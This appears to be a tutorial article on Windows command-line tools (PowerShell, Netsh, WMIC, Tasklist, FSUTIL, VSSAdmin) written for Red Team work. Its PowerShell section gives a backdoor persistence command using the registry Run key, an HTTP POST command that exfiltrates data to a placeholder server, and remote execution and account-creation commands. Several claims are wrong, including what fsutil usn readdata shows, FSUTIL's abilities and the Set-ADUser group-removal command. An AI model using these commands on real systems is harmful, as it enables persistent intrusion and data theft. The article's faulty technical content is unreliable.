As a Red Team member, you need to have a solid understanding of the command-line tools available to you on Windows systems. In this article, we will explore some of the most powerful command-line tools available for advanced Red Team members: PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin.
PowerShell
PowerShell is a command-line shell and scripting language designed specifically for Windows. It is based on the .NET Framework and provides access to a wide range of Windows administration capabilities. PowerShell is often used for automating tasks, but it is also a powerful tool for performing tasks manually.
One of the main advantages of PowerShell is that it provides access to the Windows Management Instrumentation (WMI) framework. This means that you can use PowerShell to perform a wide range of system administration tasks, such as managing processes, services, and users. Additionally, PowerShell provides access to the Registry and Active Directory, which are two critical components of Windows administration.
PowerShell is often used for post-exploitation activities, as it provides a way to execute commands and scripts on a compromised system. To use PowerShell, simply open a command prompt and type “powershell”. This will start the PowerShell shell, which looks similar to a typical command prompt, but with a different prompt (">" instead of “>_”).
One of the most useful PowerShell commands for Red Team members is “Invoke-Command”. This command allows you to execute a command or script on a remote system. For example, if you have compromised a system and want to execute a PowerShell script on it, you can use the following command:
Invoke-Command -ComputerName <hostname> -ScriptBlock { <PowerShell script> }
This will execute the PowerShell script on the remote system. You will need to have administrative credentials on the remote system to use this command.
Another useful PowerShell command is “Get-WmiObject”. This command allows you to retrieve information from the WMI framework. For example, you can use the following command to retrieve a list of running processes on a system:
Get-WmiObject -Class Win32_Process
This will return a list of all running processes on the local system. You can use the “-ComputerName” parameter to retrieve the process list from a remote system.
Using PowerShell for post-exploitation activities
As a Red Team member, one of your primary objectives is to maintain access to a compromised system. PowerShell can be used to perform post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.
To create a backdoor on a compromised system using PowerShell, you can use the following command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "<backdoor_name>" -Value "<backdoor_path>" -PropertyType String
This command creates a new registry value under the “Run” key that points to the backdoor executable. This ensures that the backdoor is executed every time the system is booted.
To exfiltrate data from a compromised system, you can use the following command:
Invoke-RestMethod -Uri "<server_url>" -Method Post -Body "<exfiltrated_data>"
This command sends an HTTP POST request to a server specified by the “server_url” parameter. The “exfiltrated_data” parameter contains the data to be exfiltrated.
To execute a command on a remote system using PowerShell, you can use the following command:
Invoke-Command -ComputerName "<remote_system>" -ScriptBlock { <command> }
This command executes the specified command on the remote system.
Using PowerShell for reconnaissance
PowerShell can be used for reconnaissance activities, such as network mapping and system enumeration. Here are some examples:
To map a network using PowerShell, you can use the following command:
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter "IPEnabled='True'" | Select-Object IPAddress
This command retrieves the IP addresses of all network adapters that are currently enabled on the system. You can use this information to map the network.
To enumerate the software installed on a system, you can use the following command:
Get-WmiObject -Class Win32_Product | Select-Object Name,Version
This command retrieves the names and versions of all software installed on the system.
Using PowerShell to manage Active Directory
PowerShell can be used to manage Active Directory, which is a critical component of Windows administration. Here are some examples:
To create a new user account in Active Directory, you can use the following command:
New-ADUser -Name "<user_name>" -GivenName "<given_name>" -Surname "<surname>" -UserPrincipalName "<user_principal_name>" -AccountPassword (ConvertTo-SecureString "<password>" -AsPlainText -Force)
This command creates a new user account with the specified name, given name, surname, and user principal name. The account password is specified using the “password” parameter.
To modify the group membership of a user account in Active Directory, you can use the following command:
Set-ADUser -Identity "<user_name>" -Remove @{MemberOf="<group_name>"}
This command removes the specified user account from the specified group.
Netsh
Netsh is a command-line tool that allows you to configure and monitor network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
One of the most useful commands in Netsh is “netsh firewall”. This command allows you to configure the Windows Firewall, which is a critical component of network security on Windows systems. For example, you can use the following command to add an inbound rule to the firewall that allows traffic on TCP port 80:
netsh firewall add portopening TCP 80 "HTTP"
This will create a new rule in the Windows Firewall that allows inbound traffic on TCP port 80.
Another useful command in Netsh is “netsh interface”. This command allows you to configure network adapters on a Windows system. For example, you can use the following command to configure the IP address and subnet mask of a network adapter:
netsh interface ip set address "Local Area Connection" static 192.168.1.10 255.255.255.0
WMIC
The Windows Management Instrumentation Command-line (WMIC) tool is a powerful command-line interface to the Windows Management Instrumentation (WMI) framework. WMIC can be used to perform a wide range of system administration tasks, such as managing processes, services, and users.
To view a list of running processes, you can use the following command:
wmic process get Name,ProcessId,CommandLine
This command retrieves the names, process IDs, and command lines of all running processes on the system.
To create a new user account, you can use the following command:
wmic useraccount create name="<user_name>" password="<password>"
This command creates a new user account with the specified name and password.
Tasklist
The Tasklist command-line tool allows you to view a list of running processes on a Windows system. Tasklist is similar to the “ps” command in Unix-based operating systems.
Tasklist can be used to identify malicious processes that may be running on a compromised system.
To identify these processes, you can use the following command:
tasklist /v /fi "imagename eq <process_name>"
This command retrieves the detailed information of the process with the specified name. By analyzing the output, you can identify whether the process is malicious.
FSUTIL
The FSUTIL command-line tool allows you to manage file systems and volumes on a Windows system. FSUTIL can be used to perform tasks such as creating and deleting file systems, compressing and decompressing files, and managing file permissions.
FSUTIL can be used to manage file permissions on a Windows system. To view the permissions of a file, you can use the following command:
fsutil usn readdata "<file_path>"
This command retrieves the USN journal data of the specified file, which includes information about the file’s permissions.
To modify the permissions of a file, you can use the following command:
icacls "<file_path>" /grant <user_name>:<permission>
This command grants the specified user the specified permission on the file.
VSSAdmin
The VSSAdmin command-line tool allows you to manage the Volume Shadow Copy Service (VSS) on a Windows system. VSS is a built-in Windows service that allows you to create backup copies of files and system states.
VSSAdmin can be used to create and manage VSS snapshots. To create a new snapshot, you can use the following command:
vssadmin create shadow /for="<volume>"
This command creates a new VSS snapshot of the specified volume.
To list all existing VSS snapshots, you can use the following command:
vssadmin list shadows
This command retrieves a list of all VSS snapshots that have been created on the system.
Conclusion
As a Red Team member, it is essential to have a solid understanding of the command-line tools available to you on Windows systems. PowerShell, Netsh, WMIC, Tasklist, FSUTIL, and VSSAdmin are some of the most powerful tools available for advanced Red Team members.
PowerShell is the most versatile and widely used tool, providing access to the Windows Management Instrumentation (WMI) framework, the Registry, and Active Directory. PowerShell is often used for post-exploitation activities, such as creating backdoors, exfiltrating data, and executing commands on a remote system.
Netsh is a powerful tool for configuring and monitoring network settings on Windows systems. It provides a wide range of functionality, from configuring network adapters to managing firewall settings.
WMIC is a powerful tool for managing processes, services, and users on a Windows system. WMIC provides access to the Windows Management Instrumentation (WMI) framework, allowing you to perform a wide range of system administration tasks.
Tasklist is a tool for viewing a list of running processes on a Windows system. Tasklist is particularly useful for identifying malicious processes that may be running on a compromised system.
FSUTIL is a tool for managing file systems and volumes on a Windows system. FSUTIL provides a wide range of functionality, from creating and deleting file systems to managing file permissions.
VSSAdmin is a tool for managing the Volume Shadow Copy Service (VSS) on a Windows system. VSSAdmin allows you to create and manage VSS snapshots, which are used for creating backup copies of files and system states.
By understanding how to use these tools effectively, Red Team members can perform a wide range of system administration tasks, from managing users and network settings to identifying and removing malicious processes. These tools are essential for any Red Team member who wants to be successful in their work.